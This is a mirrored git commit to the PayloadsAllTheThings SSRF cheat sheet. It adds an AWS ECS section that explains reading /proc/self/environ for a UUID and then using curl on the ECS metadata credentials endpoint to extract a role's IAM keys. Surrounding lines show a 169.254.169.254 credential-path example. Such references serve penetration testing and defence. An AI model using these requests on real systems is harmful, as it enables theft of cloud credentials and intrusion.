mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 19:36:11 +00:00
SSRF for ECS
This commit is contained in:
parent
57628ffd18
commit
05b3e13098
@ -31,6 +31,7 @@
|
|||||||
* [SSRF to XSS](#ssrf-to-xss)
|
* [SSRF to XSS](#ssrf-to-xss)
|
||||||
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||||
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||||
|
* [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
|
||||||
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
|
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
|
||||||
* [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)
|
* [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)
|
||||||
* [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
|
* [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
|
||||||
@ -421,6 +422,15 @@ E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugi
|
|||||||
|
|
||||||
E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
|
E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
|
||||||
|
|
||||||
|
### SSRF URL for AWS ECS
|
||||||
|
|
||||||
|
If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://169.254.170.2/v2/credentials/<UUID>
|
||||||
|
```
|
||||||
|
|
||||||
|
This way you'll extract IAM keys of the attached role
|
||||||
|
|
||||||
### SSRF URL for AWS Elastic Beanstalk
|
### SSRF URL for AWS Elastic Beanstalk
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user